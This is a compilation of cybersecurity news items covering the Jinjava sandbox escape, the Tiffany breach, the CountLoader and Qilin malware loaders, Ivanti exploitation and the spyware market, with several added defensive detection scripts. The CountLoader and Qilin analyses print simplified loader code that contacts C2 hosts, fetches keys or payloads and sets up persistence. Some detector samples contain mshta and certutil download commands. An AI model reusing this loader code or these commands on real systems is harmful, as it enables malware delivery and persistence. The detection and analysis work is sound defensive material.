• On September 18, 2025, Orange Cert publicly disclosed a critical authentication bypass vulnerability affecting Nokia’s CBIS (CloudBand Infrastructure Software) and NCS (Nokia Container Service) Manager API (CVE-2023-49564). With a CVSS 3.1 score of 9.6 (AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H), the vulnerability poses a severe risk to organizations relying on these management platforms to orchestrate and secure their containerized network […]

    The post Nokia CBIS/NCS Manager API Vulnerability Allows Attackers to Bypass Authentication appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • A newly disclosed flaw in HubSpot’s open-source Jinjava template engine could allow attackers to bypass sandbox restrictions and achieve remote code execution (RCE) on thousands of websites relying on versions prior to 2.8.1. 

Tracked as CVE-2025-59340 and rated Critical (CVSS v3.1 10.0 in the disclosure; the summary table below gives 9.8), the issue stems from JavaType-based deserialization, which lets an attacker instantiate arbitrary classes despite the existing sandbox protections.

    Jinjava Sandbox Escape

Jinjava’s sandbox is designed to block dangerous calls such as getClass() and to forbid direct instantiation of Class objects.

    Security researchers found, however, that the built-in ____int3rpr3t3r____ variable exposes the active JinjavaInterpreter instance, from which a template can reach the interpreter’s internal Jackson ObjectMapper and call its unrestricted readValue method.

    Deserializing attacker-controlled input into a type such as java.net.URL turns that call into a primitive for reading local files.

    Because JavaType construction is not blacklisted, the escape allows semi-arbitrary classes to be instantiated. That primitive yields SSRF and arbitrary file reads on its own and, when chained with additional gadgets, remote code execution.

    Production applications integrating Jinjava via Maven coordinates com.hubspot.jinjava:jinjava in versions older than 2.8.1 are vulnerable. 

    Thousands of content management systems, email template renderers, and custom web applications that employ dynamic template rendering may be at risk. 

    Exploitation requires no user interaction and carries a Network attack vector with Low complexity and no privileges required.

Risk factors           Details
    Affected products      com.hubspot.jinjava:jinjava (< 2.8.1)
    Impact                 Sandbox escape, arbitrary file reads, SSRF, potential remote code execution
    Exploit prerequisites  Network access; no privileges; no user interaction
    CVSS 3.1 score         10.0 (Critical; also reported as 9.8)

    Mitigation

    To address the issue, HubSpot released jinjava 2.8.1, which adds explicit restrictions on JavaType usage, blocking constructFromCanonical for untrusted inputs and reinforcing the blacklist in JinjavaBeanELResolver. 

    Administrators are urged to upgrade immediately and audit template code for any direct or indirect use of ____int3rpr3t3r____.

    Security teams should also review their dependency graphs for other libraries exposing Jackson’s ObjectMapper without adequate type restrictions. 

    Implementing strict input validation, disabling default typing where feasible, and applying runtime instrumentation to detect suspicious deserialization calls can further harden defenses against similar template engine bypasses.

    By proactively patching and tightening sandbox controls, organizations can prevent unauthorized file access, SSRF, and potential RCE stemming from deserialization chains in Jinjava.
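    As an added example (not HubSpot’s code and not taken from the advisory), the Python script below performs the two checks the mitigation calls for, offline: it resolves the com.hubspot.jinjava:jinjava version declared in a Maven pom.xml (including ${property} references) and reports anything below 2.8.1, and it scans template text for the ____int3rpr3t3r____ variable together with a few assumed neighbouring indicators of a template reaching into Jackson (readValue, constructFromCanonical, ObjectMapper access). The pom and templates embedded in it are constructed samples; only the variable name and the fixed version come from the text above.

```python
"""Audit a Maven project against the Jinjava sandbox-escape advisory.

Added example, not HubSpot's code. It resolves the jinjava version declared in
a pom.xml (including ${property} references) and scans template text for the
____int3rpr3t3r____ variable and a few assumed neighbouring indicators.
"""
import re
import xml.etree.ElementTree as ET

FIXED_VERSION = (2, 8, 1)            # first release that restricts JavaType use
JINJAVA = ("com.hubspot.jinjava", "jinjava")
MAVEN_NS = "{http://maven.apache.org/POM/4.0.0}"

# Only ____int3rpr3t3r____ comes from the advisory; the rest are assumed
# heuristics for "template reaches into Jackson" and may need tuning.
TEMPLATE_INDICATORS = [
    re.compile(r"____int3rpr3t3r____"),
    re.compile(r"\b(?:getObjectMapper|objectMapper)\b"),
    re.compile(r"\breadValue\b"),
    re.compile(r"\bconstructFromCanonical\b"),
    re.compile(r"\.getClass\b"),
]


def parse_version(text):
    """'2.7.3-SNAPSHOT' -> (2, 7, 3); non-numeric tails are ignored."""
    parts = []
    for piece in text.strip().split("-")[0].split("."):
        if not piece.isdigit():
            break
        parts.append(int(piece))
    return tuple(parts)


def is_vulnerable_version(text):
    """True when the declared version is older than the fixed release."""
    return parse_version(text) < FIXED_VERSION


def find_vulnerable_jinjava(pom_xml):
    """Return [(groupId:artifactId, version)] for jinjava deps below 2.8.1.

    Versions the pom itself cannot resolve (inherited from a parent or a BOM)
    are reported as 'unresolved' so they get looked at by hand.
    """
    root = ET.fromstring(pom_xml)
    ns = MAVEN_NS if root.tag.startswith("{") else ""
    props = {p.tag.replace(ns, ""): (p.text or "").strip()
             for p in root.findall(f"{ns}properties/*")}
    findings = []
    for dep in root.iter(f"{ns}dependency"):
        gid = dep.findtext(f"{ns}groupId", "").strip()
        aid = dep.findtext(f"{ns}artifactId", "").strip()
        if (gid, aid) != JINJAVA:
            continue
        version = dep.findtext(f"{ns}version", "").strip()
        ref = re.fullmatch(r"\$\{(.+)\}", version)
        if ref:
            version = props.get(ref.group(1), "")
        if not version:
            findings.append((f"{gid}:{aid}", "unresolved"))
        elif is_vulnerable_version(version):
            findings.append((f"{gid}:{aid}", version))
    return findings


def scan_template(text):
    """Return (line_number, matched_text) for each line hitting an indicator."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for pattern in TEMPLATE_INDICATORS:
            match = pattern.search(line)
            if match:
                hits.append((lineno, match.group(0)))
                break
    return hits


def audit(pom_xml, templates):
    """Run both checks; templates maps file name -> template text."""
    flagged = {name: scan_template(body) for name, body in templates.items()}
    return {"dependencies": find_vulnerable_jinjava(pom_xml),
            "templates": {name: hits for name, hits in flagged.items() if hits}}


# Constructed sample inputs (not taken from any real project).
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <properties><jinjava.version>2.7.3</jinjava.version></properties>
  <dependencies>
    <dependency>
      <groupId>com.hubspot.jinjava</groupId>
      <artifactId>jinjava</artifactId>
      <version>${jinjava.version}</version>
    </dependency>
  </dependencies>
</project>"""

SAMPLE_TEMPLATES = {
    "welcome.html": "<p>Hello {{ user.firstName }}</p>",
    "suspicious.html": "{% set it = ____int3rpr3t3r____ %}\n{{ it }}",
    "legacy.html": "{{ mapper.readValue(payload) }}",
}

if __name__ == "__main__":
    for kind, result in audit(SAMPLE_POM, SAMPLE_TEMPLATES).items():
        print(kind, result)
```

    The version comparison is deliberately conservative: a version that cannot be resolved from the pom is reported rather than silently skipped, because a parent POM or BOM pinning an old jinjava is exactly the case a quick grep misses.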

Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.

    The post HubSpot’s Jinjava Engine Vulnerability Exposes Thousands of Websites to RCE Attacks appeared first on Cyber Security News.


  • Luxury jewelry brand Tiffany and Company has confirmed a data breach that resulted in the theft of customers’ personal information.

    The company is in the process of sending out notification letters to affected individuals, detailing the scope of the incident and the data that was compromised.

    According to the notification, Tiffany experienced a “cybersecurity issue” on or around May 12, 2025, which allowed an unauthorized party to access certain company systems.

    After discovering the intrusion, Tiffany launched an investigation with the assistance of external cybersecurity experts to determine the nature and extent of the attack.

    On September 9, 2025, the investigation determined that the unauthorized party had accessed and obtained information related to customer gift cards. The company has also coordinated with law enforcement authorities regarding the incident.

    Compromised Customer Data

    The investigation revealed that several types of personal information were stolen. The compromised data includes client names, postal addresses, email addresses, phone numbers, sales data, and internal client reference numbers.

    Most critically, the attackers also managed to steal Tiffany gift card numbers and their associated PINs.

    Tiffany’s notice clarifies that not all of these data elements were affected for every impacted individual. To date, the company states it has no evidence that the stolen information has been misused.

    In response to the breach, Tiffany has taken steps to enhance the security of its systems and data. The company is advising clients to be cautious of any unsolicited communications that ask for personal information or direct them to a web page asking for such details.

    Customers are urged not to click on links or download attachments from suspicious emails. Tiffany also encourages affected individuals to remain vigilant by reviewing their account statements and monitoring their free credit reports.

    Under U.S. law, individuals are entitled to one free credit report annually from each of the three major credit bureaus.

    For further questions, a toll-free number has been established for customers, available Monday through Friday, 9:00 A.M. to 5:00 P.M. Eastern Time.


    The post Luxury Jewelry Creator Tiffany Confirms Data breach – Hackers Stolen Users Personal Information appeared first on Cyber Security News.


• Two prominent Russian state-sponsored hacking groups, Gamaredon and Turla, have been observed collaborating in sophisticated cyberattacks targeting Ukrainian organizations to deploy the advanced Kazuar backdoor. New evidence reveals an unprecedented level of coordination between these Federal Security Service (FSB) […]

    The post Russian Hacking Groups Gamaredon and Turla Target Organizations to Deliver Kazuar Backdoor appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • In recent months, security teams have observed the emergence of a sophisticated malware loader, dubbed CountLoader, which leverages weaponized PDF files to deliver ransomware payloads.

    First detected in late August 2025, CountLoader is linked to multiple Russian-speaking cybercriminal groups, including affiliates of LockBit, BlackBasta, and Qilin.

By masquerading as legitimate documents, often impersonating Ukrainian law enforcement, the loader relies on social engineering rather than a document exploit to gain an initial foothold in target environments.

    CountLoader’s deployment methodology revolves around three distinct versions written in JScript (.hta), .NET, and PowerShell.

    Each variant exhibits unique attributes: the JScript version offers the most comprehensive functionality with multiple download and execution methods, the .NET binary enforces a hardcoded kill switch after a preset date, and the PowerShell script persists as a concise loader with reflective in-memory execution.

Silent Push analysts noted that all variants share a custom C2 protocol that obscures control traffic with XOR and Base64. This is obfuscation rather than real encryption: the traffic can be decoded once the XOR key is recovered from the loader.

    The impact of CountLoader extends well beyond initial access. Upon execution, the loader fingerprints device-specific details, such as hardware identifiers, domain membership and installed antivirus products, to generate a unique victim ID.

    It then engages in persistent C2 polling loops, downloading secondary payloads such as Cobalt Strike beacons, Adaptix implants, and pureHVNC backdoors.

    Organizations with domain-joined systems in Eastern Europe have been the primary targets, suggesting strategic selection of corporate and governmental entities.

    PDF lure impersonating the Ukrainian police (Source – Silent Push)

    CountLoader was notably delivered via a PDF-based phishing lure impersonating the National Police of Ukraine. The malicious PDF contained an embedded HTML application object that triggered mshta.exe to fetch and execute the JScript loader.

    Upon opening the document, victims encountered an official-looking notification instructing them to “start your request” via an embedded link, which initiated the loader download process.

    Infection Mechanism

    CountLoader’s infection mechanism begins with the weaponized PDF exploiting user interaction rather than zero-day vulnerabilities.

    The PDF embeds an HTA object that invokes the Windows mshta engine when clicked.

    This HTA script is obfuscated using a free JavaScript obfuscator and contains around 850 lines of code.

    Primary function (Source – Silent Push)

After deobfuscation, the main loop responsible for C2 contact is visible. The listing below is a simplified rendering of that logic in modern JavaScript syntax (the JScript engine behind mshta does not support let or template literals), the helper functions it calls are defined elsewhere in the script, and the .example.com host stands in for the real one:

    // Try up to ten candidate C2 hosts in turn; stop at the first one that answers.
    for (let i = 1; i <= 10; i++) {
        let c2Url = `https://ms-team-ping${i}.com/api/getFile?fn=CheckStatus`;
        // Sends the victim fingerprint and decodes (XOR + Base64) the reply.
        let response = CheckStatusC2ReturnDecryptedResponse(c2Url, victimFingerprint);
        if (response === "success") {
            // Same host, but switch from the CheckStatus endpoint to the connect endpoint.
            connectAndAuthenticate(c2Url.replace("CheckStatus", "connect"), victimFingerprint);
            break;
        }
    }
    // Persistence: a scheduled task that re-launches the loader through mshta
    // ten minutes later (ISO 8601 duration PT10M).
    CreateScheduledTask({
        name: "GoogleUpdaterTaskSystem",
        command: `mshta https://${envVar}.example.com/start`,
        delay: "PT10M"
    });

Upon successful contact, CountLoader sends HTTP POST requests carrying a Bearer token issued by the C2 to fetch tasks.

    These tasks include downloading executables via WinHTTP, MSXML2, curl, bitsadmin or certutil, which gives the loader several fallback download paths if one of them is blocked or monitored.

    Once a task has been executed, CountLoader reports completion back to the server so the operator can track which tasks ran on which victim.

    This infection workflow underscores CountLoader’s design as a highly modular and persistent loader, capable of delivering diverse ransomware and post-exploitation tools while evading detection through obfuscation and encrypted communications.
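    The process-level view of that chain, as an added example that is not Silent Push’s code: a small Python detector run over constructed Sysmon-style process-creation records (Event ID 1 fields Image, ParentImage, CommandLine). It flags mshta.exe launched with a remote URL, a script host spawned by a PDF or Office viewer, curl/bitsadmin/certutil invoked with a URL, and a schtasks /create whose action is mshta. The viewer list, the sample events and the example.invalid hosts are assumptions for illustration.

```python
"""Process-creation detections for the CountLoader chain described above.

Added example, not Silent Push's code. It runs a few rules over constructed
Sysmon-style (Event ID 1) records: remote HTA via mshta, script hosts spawned
by document viewers, download-capable LOLBins given a URL, and schtasks
creating a task whose action is mshta.
"""
import re

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
# Viewers that have no business launching a script host (assumed list).
DOCUMENT_VIEWERS = {"acrobat.exe", "acrord32.exe", "foxitreader.exe",
                    "winword.exe", "excel.exe", "outlook.exe"}
# Built-in downloaders the text says the loader's tasks fall back to.
DOWNLOAD_LOLBINS = {"curl.exe", "bitsadmin.exe", "certutil.exe"}


def basename(path):
    """'C:\\Windows\\System32\\mshta.exe' -> 'mshta.exe'."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the rule names an event trips (empty list means no finding)."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    has_url = bool(URL_RE.search(cmd))
    hits = []
    if image == "mshta.exe" and has_url:
        hits.append("mshta_remote_hta")           # HTA pulled straight from a web server
    if image in SCRIPT_HOSTS and parent in DOCUMENT_VIEWERS:
        hits.append("script_host_from_document")  # the PDF-lure hand-off itself
    if image in DOWNLOAD_LOLBINS and has_url:
        hits.append("lolbin_download")            # curl/bitsadmin/certutil fetching a file
    if (image == "schtasks.exe" and re.search(r"/create\b", cmd, re.I)
            and re.search(r"\bmshta\b", cmd, re.I)):
        hits.append("schtask_mshta_persistence")  # mshta re-launched on a schedule
    return hits


def run_detections(events):
    """Map event index -> rule hits, for events that trip at least one rule."""
    findings = {}
    for index, event in enumerate(events):
        hits = classify(event)
        if hits:
            findings[index] = hits
    return findings


# Constructed sample events; hosts use the reserved example.invalid domain.
ACROBAT = r"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe"
SAMPLE_EVENTS = [
    {"Image": ACROBAT, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f'"{ACROBAT}" "C:\\Users\\u\\Downloads\\notice.pdf"'},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": ACROBAT,
     "CommandLine": "mshta https://example.invalid/api/getFile?fn=start"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"certutil -urlcache -split -f https://example.invalid/s2.exe "
                    r"C:\Users\u\AppData\Local\Temp\s2.exe"},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": 'schtasks /create /tn GoogleUpdaterTaskSystem '
                    '/tr "mshta https://example.invalid/start" /sc minute /mo 10'},
    {"Image": r"C:\Windows\System32\certutil.exe",        # benign: local hashing
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil -hashfile C:\tools\agent.msi SHA256"},
]

if __name__ == "__main__":
    for index, hits in run_detections(SAMPLE_EVENTS).items():
        print(index, SAMPLE_EVENTS[index]["CommandLine"], "->", hits)
```

    The last sample event is there on purpose: certutil hashing a local file trips nothing, because the rule keys on the presence of a URL rather than on the binary name alone, which is what keeps a LOLBin rule from drowning in benign administration noise.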


    The post New Malware Loader ‘CountLoader’ Weaponized PDF File to Deliver Ransomware appeared first on Cyber Security News.


  • Cyber threat actors have weaponized two critical Ivanti Endpoint Manager Mobile (EPMM) vulnerabilities—CVE-2025-4427 and CVE-2025-4428—to deploy sophisticated malicious loaders and listeners on compromised servers. The malware consists of two sets of components: Loader 1 (web-install.jar, ReflectUtil.class, SecurityHandlerWanListener.class) and Loader 2 (web-install.jar, WebAndroidAppInstaller.class), both designed to inject arbitrary code and maintain persistence on Apache Tomcat deployments. […]

    The post CISA Alerts of Hackers Targeting Ivanti Endpoint Manager Mobile Vulnerabilities to Distribute Malware appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • The ransomware threat landscape witnessed a dramatic shift in August 2025 as the Qilin group claimed responsibility for 104 separate attacks worldwide.

Qilin has cemented its position through aggressive double-extortion tactics and a broad affiliate recruitment strategy.

    Initial compromises have predominantly leveraged exposed Remote Desktop Protocol (RDP) servers and publicly facing VPN gateways, allowing affiliates to establish footholds before deploying the ransomware payload.

    Across sectors—from manufacturing to professional services—victims reported sudden system encryption followed by data theft and extortion demands.

    Cyble’s August threat landscape report highlights not only the volume of Qilin’s attacks but also the increasing sophistication of its tooling and campaigns.

Its affiliates exploit weak credentials and unpatched vulnerabilities for initial access and reconnaissance. After lateral movement, the group executes a bespoke encryption binary designed to target network-attached storage shares and critical file servers.

    The global distribution of Qilin’s claimed victims shows the group’s reach across North America, Europe, and Asia.

    Top 10 Country Wise Attacks (Source – Cyble)

    Cyble analysts noted that Qilin’s payload employs a multi-stage loader, which decrypts the core ransomware executable at runtime using a dynamically generated AES key.

    Once decrypted, the payload scans the local filesystem for predefined extensions—such as .docx, .xlsx, and .pdf—and applies AES-CTR encryption.

    Following file encryption, Qilin writes ransom notes to each directory in a file named README_QILIN.txt. Victims are directed to a Tor-based payment portal and threatened with public data leaks if payment is not received.

    In cases where organizations ignored demands, Qilin affiliates began publishing exfiltrated data on leak sites within 48 hours, accelerating the pressure on incident responders.

    The rapid escalation of Qilin’s operations marks it as the most prolific ransomware group in August, nearly doubling the activity of its nearest competitor, Akira.

    Beyond sheer volume, Qilin’s evolving toolkit—particularly its loader and encryption routines—demonstrates a concerted effort to evade detection and hinder remediation.

    Infection Mechanism and Encryption Workflow

Qilin’s infection mechanism begins with an affiliate delivering a malicious ZIP archive, typically named to mimic a legitimate software update.

    Upon execution, a PowerShell one-liner drops and launches a loader binary (qlnldr.exe) in the %TEMP% directory. The loader then performs the following steps. The snippet is illustrative of the reported flow rather than a verbatim sample; in particular, .NET’s CipherMode enumeration has no CTR member, so the mode assignment would fail as written:

    # Qilin loader snippet: decrypt and execute the core ransomware
    # Fetch the per-victim AES key from the affiliate's server (URL defanged)
    $encKey = (Invoke-WebRequest "http://malicious[.]site/key").Content
    # Read the encrypted core as raw bytes (-AsByteStream is PowerShell 6+;
    # Windows PowerShell 5.1 would need -Encoding Byte)
    $encryptedPayload = Get-Content "$env:TEMP\qln_core.bin" -AsByteStream
    $decrypted = New-Object System.Security.Cryptography.AesCryptoServiceProvider
    $decrypted.Key = [Convert]::FromBase64String($encKey)
    # NOTE: CipherMode has no CTR value; this line throws as written
    $decrypted.Mode = 'CTR'
    $transform = $decrypted.CreateDecryptor()
    $coreBytes = $transform.TransformFinalBlock($encryptedPayload, 0, $encryptedPayload.Length)
    # Drop the decrypted core next to the loader and start it
    [System.IO.File]::WriteAllBytes("$env:TEMP\qilin.exe", $coreBytes)
    Start-Process "$env:TEMP\qilin.exe"

    Upon initialization, qilin.exe generates a unique AES session key, encrypts files across mapped drives, and exfiltrates sensitive documents over an HTTPS channel.

    Persistence is achieved by registering the loader in the HKCU\Software\Microsoft\Windows\CurrentVersion\Run registry key, ensuring execution after reboot.

The loader’s decryption sequence and registry persistence mechanism give defenders visibility into Qilin’s infection chain and concrete artifacts to detect on: the key-fetch request, the drop into %TEMP%, the Start-Process of a freshly written executable, and the HKCU Run-key entry.
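    One way to catch that chain in PowerShell Script Block Logging (Event ID 4104) is to score co-occurring indicator categories rather than alert on any single cmdlet, because Invoke-WebRequest or an AES decrypt on its own is routine in administration scripts. The Python below is an added example, not Cyble’s tooling; the indicator regexes, the threshold of three categories and the three sample script blocks (one loader-like, two benign) are constructed assumptions.

```python
"""Score PowerShell Script Block Logging (Event ID 4104) text for the Qilin
loader pattern: remote key fetch, Base64 decode, AES decrypt, drop into
%TEMP%, execute, Run-key persistence.

Added example, not Cyble's tooling. One cmdlet alone is not a signal (admins
download installers and decrypt configs all day); three or more of the
categories below in a single script block is worth a look.
"""
import re

INDICATORS = {
    "download":  r"Invoke-WebRequest|Invoke-RestMethod|Net\.WebClient|DownloadString|DownloadFile",
    "decode":    r"FromBase64String",
    "decrypt":   r"AesCryptoServiceProvider|AesManaged|Aes\]::Create|CreateDecryptor|TransformFinalBlock",
    "drop_temp": r"(?:WriteAllBytes|Set-Content|Out-File)[^\n]*\$env:TEMP",
    "execute":   r"Start-Process|Invoke-Expression|\biex\b|Invoke-Item",
    "persist":   r"CurrentVersion\\Run\b",
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in INDICATORS.items()}
ALERT_THRESHOLD = 3   # assumed; tune against your own 4104 baseline


def score_script_block(text):
    """Return (score, sorted category names) for one ScriptBlockText value."""
    hit = sorted(name for name, rx in COMPILED.items() if rx.search(text))
    return len(hit), hit


def triage(blocks):
    """Map block id -> (score, categories, alert) so the analyst sees why it fired."""
    result = {}
    for block_id, text in blocks.items():
        score, categories = score_script_block(text)
        result[block_id] = (score, categories, score >= ALERT_THRESHOLD)
    return result


# Constructed sample script blocks; the first mirrors the reported loader flow.
SAMPLE_BLOCKS = {
    "loader_like": r'''
$k = (Invoke-WebRequest "http://example.invalid/key").Content
$blob = Get-Content "$env:TEMP\core.bin" -AsByteStream
$aes = New-Object System.Security.Cryptography.AesCryptoServiceProvider
$aes.Key = [Convert]::FromBase64String($k)
$out = $aes.CreateDecryptor().TransformFinalBlock($blob, 0, $blob.Length)
[System.IO.File]::WriteAllBytes("$env:TEMP\core.exe", $out)
Start-Process "$env:TEMP\core.exe"
Set-ItemProperty HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name svc -Value "$env:TEMP\core.exe"
''',
    "admin_installer": r'''
Invoke-WebRequest https://example.invalid/agent.msi -OutFile C:\Deploy\agent.msi
Start-Process msiexec.exe -ArgumentList "/i C:\Deploy\agent.msi /qn" -Wait
''',
    "config_decrypt": r'''
$aes = [System.Security.Cryptography.Aes]::Create()
$aes.Key = [Convert]::FromBase64String((Get-Content C:\svc\key.b64))
$plain = $aes.CreateDecryptor().TransformFinalBlock($cipher, 0, $cipher.Length)
''',
}

if __name__ == "__main__":
    for block_id, (score, categories, alert) in triage(SAMPLE_BLOCKS).items():
        print(f"{block_id}: score={score} {categories} alert={alert}")
```

    Scoring by category rather than by raw keyword count matters: the benign config-decrypt block hits three decrypt-family regexes but still counts as one category, so it stays below the threshold.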


    The post Qilin Led Ransomware Attack Claimed to Compromised 104 Organizations in August appeared first on Cyber Security News.


  • The global spyware market continues its alarming expansion, with new research revealing the emergence of 130 additional entities spanning 46 countries between 1992 and 2024.

    This shadowy ecosystem of surveillance technologies has grown from 435 documented entities in the initial assessment to 561 organizations, fundamentally reshaping the landscape of offensive cyber capabilities.

    The proliferation extends far beyond traditional spyware vendors, encompassing a complex web of investors, suppliers, intermediaries, and subsidiaries that collectively fuel a multi-billion dollar market with severe implications for national security and human rights.

    The market’s evolution demonstrates sophisticated organizational structures designed to obfuscate accountability and circumvent regulatory oversight.

    These entities employ strategic jurisdictional arbitrage, frequently shifting corporate structures and legal identities to evade detection and sanctions.

    The surveillance-for-hire industry has witnessed unprecedented growth in US-based investment, with American entities now representing the largest investor category in the global spyware ecosystem.

    This surge represents a three-fold increase from previous assessments, with 31 US-based investors directing capital toward controversial spyware vendors, including those already sanctioned by the US government.

    Atlantic Council analysts identified critical vulnerabilities in market transparency mechanisms that enable malicious actors to exploit regulatory gaps.

    The researchers documented how resellers and brokers operate as crucial intermediaries, creating layers of obfuscation that make attribution and enforcement extraordinarily challenging.

    These findings emerge from comprehensive analysis of corporate registries, leaked documentation, and transparency initiatives across multiple jurisdictions.

    Of particular concern is the discovery of 43 entirely new entities that entered the spyware market specifically during 2024, highlighting the accelerating pace of market expansion despite international efforts to constrain proliferation.

    The research identified new countries joining the ecosystem, including Japan, Malaysia, and Panama, while documenting the addition of 20 US-based investors who collectively channeled resources toward Israeli spyware vendors known for targeting journalists, diplomats, and civil society organizations.

    The technical architecture of modern spyware operations reveals sophisticated infection mechanisms that exploit zero-day vulnerabilities and legitimate system processes to maintain persistence.

    These surveillance tools demonstrate advanced capabilities including remote access trojans, keyloggers, screen capture functionality, and encrypted communication channels that enable covert data exfiltration.

    The malware typically employs multi-stage deployment processes, beginning with social engineering vectors or exploit kits that compromise target devices before establishing command and control infrastructure.

    Advanced Persistence and Evasion Techniques

    Contemporary spyware implementations leverage sophisticated persistence mechanisms that operate at multiple system levels to maintain long-term access to compromised devices.

    These tools employ rootkit-like functionality to embed themselves deep within operating system kernels, utilizing legitimate system processes to mask malicious activities from security monitoring solutions.

    The malware frequently implements process hollowing techniques, injecting malicious code into trusted system processes such as svchost.exe or explorer.exe to appear legitimate to security scanners.

    The infection chain typically begins with exploitation of browser vulnerabilities or messaging applications, followed by privilege escalation routines that grant system-level access.

    Once established, the spyware creates multiple persistence points including registry modifications, scheduled tasks, and service installations that ensure survival across system reboots and security updates.

    Modern variants implement sophisticated anti-analysis techniques, including virtual machine detection, debugger evasion, and code obfuscation to prevent reverse engineering efforts.

Registry Persistence Example:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    "SystemUpdate" = "C:\Windows\System32\svchost.exe -k netsvcs"

    An entry like this is itself an indicator: svchost.exe hosts services and is started only by services.exe, so it has no legitimate reason to appear as a Run-key value, and the generic name "SystemUpdate" is chosen to blend in with benign autostart entries.
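    Both Run-key patterns on this page, the Qilin loader registering itself under the HKCU Run key from %TEMP% (earlier item) and the svchost.exe entry just above, can be checked offline from a reg export. The Python below is an added example, not from the Atlantic Council or Cyble research; the .reg text, value names and rule lists (processes that are never legitimately autostarted this way, script hosts, user-writable scratch directories) are constructed assumptions.

```python
r"""Offline audit of Run-key autostart entries from a .reg export.

Added example (not from the research above). Feed it the text produced by
  reg export HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hklm-run.reg
  reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run hkcu-run.reg
It flags values whose image is a process that is never legitimately
autostarted this way (svchost.exe is only ever started by services.exe),
a script host, or an executable living in a user-writable scratch directory
such as %TEMP%. The rule lists and the sample export are assumptions.
"""
import re

VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
IMAGE_RE = re.compile(r'^"?(.*?\.(?:exe|hta|js|vbs|ps1|bat|cmd))\b', re.IGNORECASE)

NEVER_AUTORUN = {"svchost.exe", "services.exe", "lsass.exe", "csrss.exe",
                 "winlogon.exe", "smss.exe", "wininit.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe"}
# Scratch locations only; AppData\Local as a whole is too noisy (OneDrive, Teams, ...).
USER_WRITABLE = re.compile(r"\\(?:Temp|Downloads|Public)\\", re.IGNORECASE)


def unescape(value):
    """Undo .reg escaping (doubled backslashes, escaped quotes)."""
    return re.sub(r"\\(.)", r"\1", value)


def parse_reg_export(text):
    """Yield (key, value_name, data) for every string value in the export."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        match = VALUE_RE.match(line)
        if key and match:
            yield key, unescape(match.group(1)), unescape(match.group(2))


def image_of(command):
    """Extract the launched file from a Run value's command string."""
    command = command.strip()
    match = IMAGE_RE.match(command)
    return match.group(1) if match else command.split(" ", 1)[0].strip('"')


def assess(command):
    """Return the reasons a Run command looks suspicious (empty = none)."""
    image = image_of(command)
    name = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if "." not in name:
        name += ".exe"            # "mshta https://..." -> mshta.exe
    reasons = []
    if name in NEVER_AUTORUN:
        reasons.append("system_process_in_run")
    if name in SCRIPT_HOSTS:
        reasons.append("script_host_in_run")
    if USER_WRITABLE.search(image):
        reasons.append("user_writable_path")
    return reasons


def audit_run_keys(export_text):
    """Return [(hive, value_name, command, reasons)] for flagged Run entries."""
    findings = []
    for key, name, command in parse_reg_export(export_text):
        if not key.lower().endswith("\\currentversion\\run"):
            continue              # RunOnce and other keys are out of scope here
        reasons = assess(command)
        if reasons:
            findings.append((key.split("\\")[0], name, command, reasons))
    return findings


# Constructed sample export (not from a real host).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
"SystemUpdate"="C:\\Windows\\System32\\svchost.exe -k netsvcs"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\u\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"qlnldr"="C:\\Users\\u\\AppData\\Local\\Temp\\qlnldr.exe"
"GoogleUpdaterTask"="mshta https://example.invalid/start"
'''

if __name__ == "__main__":
    for hive, name, command, reasons in audit_run_keys(SAMPLE_REG):
        print(f"{hive}: {name} = {command!r} -> {reasons}")
```

    The quoted OneDrive entry is the usual false-positive trap: the image extractor has to honour the surrounding quotes so that a path with spaces is not cut at the first space, and AppData\Local is deliberately not treated as suspicious on its own.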

    The command and control infrastructure demonstrates remarkable resilience through domain generation algorithms and encrypted communication protocols that make network-based detection challenging.

    These systems often utilize legitimate cloud services as proxy layers, routing surveillance data through compromised infrastructure to obscure the ultimate destination.

    The malware maintains operational security through certificate pinning, traffic obfuscation, and the use of popular communication protocols that blend seamlessly with normal network traffic.

    Detection evasion capabilities include real-time monitoring of security software processes, with the ability to suspend operations when analysis tools are detected.

    The spyware frequently implements sandbox evasion techniques, checking for virtual machine artifacts, mouse movement patterns, and system resource limitations that indicate automated analysis environments.

